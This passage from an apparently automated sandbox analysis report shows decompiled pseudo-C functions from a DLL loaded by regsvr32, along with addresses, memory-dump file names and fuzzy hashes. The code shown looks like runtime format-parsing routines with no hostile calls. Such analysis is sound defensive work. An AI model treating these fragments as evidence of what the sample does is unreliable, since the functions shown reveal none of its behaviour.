                                                                      				signed int _v24;
                                                                      				intOrPtr _t54;
                                                                      				void* _t80;
                                                                      				intOrPtr* _t93;
                                                                      				intOrPtr _t95;
                                                                      				intOrPtr _t97;
                                                                      				void* _t102;
                                                                      				void* _t112;
                                                                      				void* _t113;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_t54 =  *((intOrPtr*)(__rcx + 0x470));
                                                                      				_t102 = __rcx;
                                                                      				if (_t54 != 1) goto 0x8000efa6;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 2) goto 0x8000efb8;
                                                                      				goto 0x8000f0ef;
                                                                      				if (_t54 != 2) goto 0x8000efb8;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) == 0) goto 0x8000f0ef;
                                                                      				_t111 =  *((intOrPtr*)(__rcx + 8));
                                                                      				 *((char*)(__rcx + 0x4c)) = 0;
                                                                      				if ( *((char*)( *((intOrPtr*)(__rcx + 8)) + 0x28)) != 0) goto 0x8000efce;
                                                                      				E00000001180006E80(__rax, __rcx, _t111, __rdx, _t112);
                                                                      				_t80 = r8d - 0xffffffff;
                                                                      				if (_t80 < 0) goto 0x8000f0aa;
                                                                      				if (_t80 == 0) goto 0x8000f0aa;
                                                                      				if (( *( *((intOrPtr*)(_t102 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8000f01b;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t102 + 0x460)) + 8)) == 0) goto 0x8000f02f;
                                                                      				if (E0000000118003EF10(r9d,  *((long long*)( *((intOrPtr*)(_t102 + 0x460)) + 8)),  *((intOrPtr*)(_t102 + 0x460))) == 0xffffffff) goto 0x8000f034;
                                                                      				 *(_t102 + 0x20) =  *(_t102 + 0x20) + 1;
                                                                      				goto 0x8000f038;
                                                                      				 *(_t102 + 0x20) =  *(_t102 + 0x20) | 0xffffffff;
                                                                      				_t93 =  *((intOrPtr*)(_t102 + 0x10));
                                                                      				r8b =  *_t93;
                                                                      				 *((long long*)(_t102 + 0x10)) = _t93 + 1;
                                                                      				 *((intOrPtr*)(_t102 + 0x39)) = r8b;
                                                                      				if (r8b != 0) goto 0x8000f0aa;
                                                                      				_t95 =  *((intOrPtr*)(_t102 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t95 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t95 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t102 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t102 + 8)), _t102,  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)))),  *((intOrPtr*)(_t102 + 0x460)), _t112, _t113,  *((intOrPtr*)(_t102 + 8)));
                                                                      				_t97 =  *((intOrPtr*)(_t102 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t97 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t97 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t102 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t102 + 8)), _t102,  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)))),  *((intOrPtr*)(_t102 + 0x460)), _t112, _t113,  *((intOrPtr*)(_t102 + 8)));
                                                                      				goto 0x8000f0f1;
                                                                      				if (( *( *((intOrPtr*)(_t102 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8000f0ce;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t102 + 0x460)) + 8)) == 0) goto 0x8000f0e6;
                                                                      				if (E0000000118003EF10(r8b,  *((long long*)( *((intOrPtr*)(_t102 + 0x460)) + 8)),  *((intOrPtr*)(_t102 + 0x460))) == 0xffffffff) goto 0x8000f0eb;
                                                                      				 *(_t102 + 0x20) =  *(_t102 + 0x20) + 1;
                                                                      				goto 0x8000f0ef;
                                                                      				 *(_t102 + 0x20) =  *(_t102 + 0x20) | 0xffffffff;
                                                                      				return 1;
                                                                      			}













                                                                      0x18000ef80
                                                                      0x18000ef8a
                                                                      0x18000ef90
                                                                      0x18000ef96
                                                                      0x18000ef9f
                                                                      0x18000efa1
                                                                      0x18000efa9
                                                                      0x18000efb2
                                                                      0x18000efb8
                                                                      0x18000efbc
                                                                      0x18000efc4
                                                                      0x18000efc9
                                                                      0x18000efd6
                                                                      0x18000efda
                                                                      0x18000eff1
                                                                      0x18000f00b
                                                                      0x18000f019
                                                                      0x18000f02d
                                                                      0x18000f02f
                                                                      0x18000f032
                                                                      0x18000f034
                                                                      0x18000f038
                                                                      0x18000f03c
                                                                      0x18000f042
                                                                      0x18000f046
                                                                      0x18000f04d
                                                                      0x18000f04f
                                                                      0x18000f058
                                                                      0x18000f05b
                                                                      0x18000f062
                                                                      0x18000f066
                                                                      0x18000f06d
                                                                      0x18000f072
                                                                      0x18000f078
                                                                      0x18000f07d
                                                                      0x18000f081
                                                                      0x18000f084
                                                                      0x18000f08b
                                                                      0x18000f08f
                                                                      0x18000f096
                                                                      0x18000f09b
                                                                      0x18000f0a1
                                                                      0x18000f0a8
                                                                      0x18000f0be
                                                                      0x18000f0cc
                                                                      0x18000f0e4
                                                                      0x18000f0e6
                                                                      0x18000f0e9
                                                                      0x18000f0eb
                                                                      0x18000f0fb

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7543209bbe262428c02fdfecd06cd5efe400fb207b6a6ec194b8e69b9ab5d90f
                                                                      • Instruction ID: d51f26f1aa99639de595d4c18c21bc773744a5f11ad1e4e3759c16ddc1bf4a4e
                                                                      • Opcode Fuzzy Hash: 7543209bbe262428c02fdfecd06cd5efe400fb207b6a6ec194b8e69b9ab5d90f
                                                                      • Instruction Fuzzy Hash: 7141917221478885E7B6CF29D0443AD37A1E349BD8F188225EF594B7EACF36C589C711
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: be55badd18065e012e05f0be0a008cade21a40068cb77b6e12f117509bd0e37d
                                                                      • Instruction ID: 148a91f297d0c8f95cc6e8c9ab7097f6db8a230eb38872b12320ec2cee237fa3
                                                                      • Opcode Fuzzy Hash: be55badd18065e012e05f0be0a008cade21a40068cb77b6e12f117509bd0e37d
                                                                      • Instruction Fuzzy Hash: D9315874619B888FD798DF38D48951ABBE0FB94314F602A2DF58AC7225DB70D845CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8fc6b039158370943127117d3cc02557d3ba2523cbfc1ab38dcadb87c96663b
                                                                      • Instruction ID: b1fa5bf78dca1fb41d875153fa2b682b3f39443c45b59a21baa92770bd5a5a9e
                                                                      • Opcode Fuzzy Hash: d8fc6b039158370943127117d3cc02557d3ba2523cbfc1ab38dcadb87c96663b
                                                                      • Instruction Fuzzy Hash: 8E41A5B490038A8FCB48DF68D89A4DE7BB1FB48348F11461DF866AB250D3B4D664CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E00000001180008A50(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, long long _a8) {
                                                                      				long long _v16;
                                                                      				signed int _v24;
                                                                      				void* _t72;
                                                                      				intOrPtr* _t85;
                                                                      				intOrPtr _t87;
                                                                      				intOrPtr _t89;
                                                                      				void* _t94;
                                                                      				void* _t104;
                                                                      				void* _t105;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t103 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t94 = __rcx;
                                                                      				 *((char*)(__rcx + 0x4c)) = 0;
                                                                      				if ( *((char*)( *((intOrPtr*)(__rcx + 8)) + 0x28)) != 0) goto 0x80008a73;
                                                                      				E00000001180006E80(__rax, __rcx, _t103, __rdx, _t104);
                                                                      				_t72 = r8d - 0xffffffff;
                                                                      				if (_t72 < 0) goto 0x80008b4f;
                                                                      				if (_t72 == 0) goto 0x80008b4f;
                                                                      				if (( *( *((intOrPtr*)(_t94 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x80008ac0;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)) == 0) goto 0x80008ad4;
                                                                      				if (E0000000118003EF10(r9d,  *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)),  *((intOrPtr*)(_t94 + 0x460))) == 0xffffffff) goto 0x80008ad9;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 1;
                                                                      				goto 0x80008add;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0xffffffff;
                                                                      				_t85 =  *((intOrPtr*)(_t94 + 0x10));
                                                                      				r8b =  *_t85;
                                                                      				 *((long long*)(_t94 + 0x10)) = _t85 + 1;
                                                                      				 *((intOrPtr*)(_t94 + 0x39)) = r8b;
                                                                      				if (r8b != 0) goto 0x80008b4f;
                                                                      				_t87 =  *((intOrPtr*)(_t94 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t87 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t87 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t94 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t94 + 8)), _t94,  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x18)))),  *((intOrPtr*)(_t94 + 0x460)), _t104, _t105,  *((intOrPtr*)(_t94 + 8)));
                                                                      				_t89 =  *((intOrPtr*)(_t94 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t89 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t89 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t94 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t94 + 8)), _t94,  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x18)))),  *((intOrPtr*)(_t94 + 0x460)), _t104, _t105,  *((intOrPtr*)(_t94 + 8)));
                                                                      				goto 0x80008b96;
                                                                      				if (( *( *((intOrPtr*)(_t94 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x80008b73;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)) == 0) goto 0x80008b8b;
                                                                      				if (E0000000118003EF10(r8b,  *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)),  *((intOrPtr*)(_t94 + 0x460))) == 0xffffffff) goto 0x80008b90;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 1;
                                                                      				goto 0x80008b94;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0xffffffff;
                                                                      				return 1;
                                                                      			}












                                                                      0x180008a50
                                                                      0x180008a5a
                                                                      0x180008a5e
                                                                      0x180008a61
                                                                      0x180008a69
                                                                      0x180008a6e
                                                                      0x180008a7b
                                                                      0x180008a7f
                                                                      0x180008a96
                                                                      0x180008ab0
                                                                      0x180008abe
                                                                      0x180008ad2
                                                                      0x180008ad4
                                                                      0x180008ad7
                                                                      0x180008ad9
                                                                      0x180008add
                                                                      0x180008ae1
                                                                      0x180008ae7
                                                                      0x180008aeb
                                                                      0x180008af2
                                                                      0x180008af4
                                                                      0x180008afd
                                                                      0x180008b00
                                                                      0x180008b07
                                                                      0x180008b0b
                                                                      0x180008b12
                                                                      0x180008b17
                                                                      0x180008b1d
                                                                      0x180008b22
                                                                      0x180008b26
                                                                      0x180008b29
                                                                      0x180008b30
                                                                      0x180008b34
                                                                      0x180008b3b
                                                                      0x180008b40
                                                                      0x180008b46
                                                                      0x180008b4d
                                                                      0x180008b63
                                                                      0x180008b71
                                                                      0x180008b89
                                                                      0x180008b8b
                                                                      0x180008b8e
                                                                      0x180008b90
                                                                      0x180008ba0

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14f891c578f2c1dcb91435851c2420b04b1af83d448bcfccc6194ce78824961a
                                                                      • Instruction ID: b27acc3981a18c4a10ca930a05153dca94d71aef7e9dc405d87a0aefb23c03ed
                                                                      • Opcode Fuzzy Hash: 14f891c578f2c1dcb91435851c2420b04b1af83d448bcfccc6194ce78824961a
                                                                      • Instruction Fuzzy Hash: 0841BE72204B8882E7A5CF2AC0413AA77A1F74AB98F188215EF890B7E9CF25C545D705
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E0000000118000B96C(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, long long _a8) {
                                                                      				long long _v16;
                                                                      				signed int _v24;
                                                                      				void* _t72;
                                                                      				intOrPtr* _t85;
                                                                      				intOrPtr _t87;
                                                                      				intOrPtr _t89;
                                                                      				void* _t94;
                                                                      				void* _t104;
                                                                      				void* _t105;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t103 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t94 = __rcx;
                                                                      				 *((char*)(__rcx + 0x4c)) = 0;
                                                                      				if ( *((char*)( *((intOrPtr*)(__rcx + 8)) + 0x28)) != 0) goto 0x8000b98f;
                                                                      				E00000001180006E80(__rax, __rcx, _t103, __rdx, _t104);
                                                                      				_t72 = r8d - 0xffffffff;
                                                                      				if (_t72 < 0) goto 0x8000ba6b;
                                                                      				if (_t72 == 0) goto 0x8000ba6b;
                                                                      				if (( *( *((intOrPtr*)(_t94 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8000b9dc;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)) == 0) goto 0x8000b9f0;
                                                                      				if (E0000000118003EF10(r9d,  *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)),  *((intOrPtr*)(_t94 + 0x460))) == 0xffffffff) goto 0x8000b9f5;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 1;
                                                                      				goto 0x8000b9f9;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0xffffffff;
                                                                      				_t85 =  *((intOrPtr*)(_t94 + 0x10));
                                                                      				r8b =  *_t85;
                                                                      				 *((long long*)(_t94 + 0x10)) = _t85 + 1;
                                                                      				 *((intOrPtr*)(_t94 + 0x39)) = r8b;
                                                                      				if (r8b != 0) goto 0x8000ba6b;
                                                                      				_t87 =  *((intOrPtr*)(_t94 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t87 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t87 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t94 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t94 + 8)), _t94,  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x18)))),  *((intOrPtr*)(_t94 + 0x460)), _t104, _t105,  *((intOrPtr*)(_t94 + 8)));
                                                                      				_t89 =  *((intOrPtr*)(_t94 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t89 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t89 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(_t94 + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t94 + 8)), _t94,  *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x18)))),  *((intOrPtr*)(_t94 + 0x460)), _t104, _t105,  *((intOrPtr*)(_t94 + 8)));
                                                                      				goto 0x8000bab2;
                                                                      				if (( *( *((intOrPtr*)(_t94 + 0x460)) + 0x14) >> 0x0000000c & 0x00000001) == 0) goto 0x8000ba8f;
                                                                      				if ( *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)) == 0) goto 0x8000baa7;
                                                                      				if (E0000000118003EF10(r8b,  *((long long*)( *((intOrPtr*)(_t94 + 0x460)) + 8)),  *((intOrPtr*)(_t94 + 0x460))) == 0xffffffff) goto 0x8000baac;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) + 1;
                                                                      				goto 0x8000bab0;
                                                                      				 *(_t94 + 0x20) =  *(_t94 + 0x20) | 0xffffffff;
                                                                      				return 1;
                                                                      			}












                                                                      0x18000b96c
                                                                      0x18000b976
                                                                      0x18000b97a
                                                                      0x18000b97d
                                                                      0x18000b985
                                                                      0x18000b98a
                                                                      0x18000b997
                                                                      0x18000b99b
                                                                      0x18000b9b2
                                                                      0x18000b9cc
                                                                      0x18000b9da
                                                                      0x18000b9ee
                                                                      0x18000b9f0
                                                                      0x18000b9f3
                                                                      0x18000b9f5
                                                                      0x18000b9f9
                                                                      0x18000b9fd
                                                                      0x18000ba03
                                                                      0x18000ba07
                                                                      0x18000ba0e
                                                                      0x18000ba10
                                                                      0x18000ba19
                                                                      0x18000ba1c
                                                                      0x18000ba23
                                                                      0x18000ba27
                                                                      0x18000ba2e
                                                                      0x18000ba33
                                                                      0x18000ba39
                                                                      0x18000ba3e
                                                                      0x18000ba42
                                                                      0x18000ba45
                                                                      0x18000ba4c
                                                                      0x18000ba50
                                                                      0x18000ba57
                                                                      0x18000ba5c
                                                                      0x18000ba62
                                                                      0x18000ba69
                                                                      0x18000ba7f
                                                                      0x18000ba8d
                                                                      0x18000baa5
                                                                      0x18000baa7
                                                                      0x18000baaa
                                                                      0x18000baac
                                                                      0x18000babc

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14f891c578f2c1dcb91435851c2420b04b1af83d448bcfccc6194ce78824961a
                                                                      • Instruction ID: a8298f3b4bb1cafcc345269216884b8c6d34b6f8ac01e8f3037918a03f09dd7a
                                                                      • Opcode Fuzzy Hash: 14f891c578f2c1dcb91435851c2420b04b1af83d448bcfccc6194ce78824961a
                                                                      • Instruction Fuzzy Hash: 1C41A172204B8885E7A5CF3AC0413AE37A1E34AFA8F188215EF5D8B7E5CF25C545CB15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 034315c3c747f5b91a409b2e422558a6e937a650bb34ce0bbf3aa3e916a7fcd0
                                                                      • Instruction ID: 5fc82f77815e19862086b270461078ac93a39f29a34634e39b2a352bae7d7fd6
                                                                      • Opcode Fuzzy Hash: 034315c3c747f5b91a409b2e422558a6e937a650bb34ce0bbf3aa3e916a7fcd0
                                                                      • Instruction Fuzzy Hash: 4841E4B590038E8FCF88DF64C88A1DE7BB1FB18358F104619EC26A6250D3B49664CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2249fabfa3cb823db5bf9abbdd2398ab86566573957ec9af594e6fbc0a5fd23a
                                                                      • Instruction ID: 522f2ac7d6e04309b329b63eebae3ea1aa9c9298f0f67c4b99f098aa0fae01c1
                                                                      • Opcode Fuzzy Hash: 2249fabfa3cb823db5bf9abbdd2398ab86566573957ec9af594e6fbc0a5fd23a
                                                                      • Instruction Fuzzy Hash: A541A0B090074E8BCF48DF68C89A5DE7FF0FB58358F114219E81AA6250D3B896A5CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a4d03f3fb9a3b8cc43f36a799b8cd90647eacd0ccfb9192fa8bc19eb539cfc30
                                                                      • Instruction ID: c05d273e23e94e3fc638d0e4544e5a510d3675943345a24469dabb0d51b4b1fc
                                                                      • Opcode Fuzzy Hash: a4d03f3fb9a3b8cc43f36a799b8cd90647eacd0ccfb9192fa8bc19eb539cfc30
                                                                      • Instruction Fuzzy Hash: 1531C2B080034A8FCB48CF64D88A5DE7FB0FB58398F11465AE859A6250D7B4D6A9CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E0000000118001A390(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001a3bb;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x8001a48a;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001a3fc;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001a48c;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x8001a47c;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x8001a438;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x8001a48c;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180017AF4(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x8001a430;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E0000000118003AA20(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001a433;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x18001a390
                                                                      0x18001a3a1
                                                                      0x18001a3a4
                                                                      0x18001a3a6
                                                                      0x18001a3ab
                                                                      0x18001a3b3
                                                                      0x18001a3b6
                                                                      0x18001a3c5
                                                                      0x18001a3c7
                                                                      0x18001a3cd
                                                                      0x18001a3d0
                                                                      0x18001a3d5
                                                                      0x18001a3d9
                                                                      0x18001a3e0
                                                                      0x18001a3e6
                                                                      0x18001a3eb
                                                                      0x18001a3f0
                                                                      0x18001a3f7
                                                                      0x18001a407
                                                                      0x18001a409
                                                                      0x18001a413
                                                                      0x18001a418
                                                                      0x18001a420
                                                                      0x18001a422
                                                                      0x18001a428
                                                                      0x18001a42d
                                                                      0x18001a430
                                                                      0x18001a436
                                                                      0x18001a438
                                                                      0x18001a43c
                                                                      0x18001a442
                                                                      0x18001a44c
                                                                      0x18001a44e
                                                                      0x18001a452
                                                                      0x18001a455
                                                                      0x18001a45c
                                                                      0x18001a460
                                                                      0x18001a467
                                                                      0x18001a46b
                                                                      0x18001a470
                                                                      0x18001a475
                                                                      0x18001a47a
                                                                      0x18001a487
                                                                      0x18001a496

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
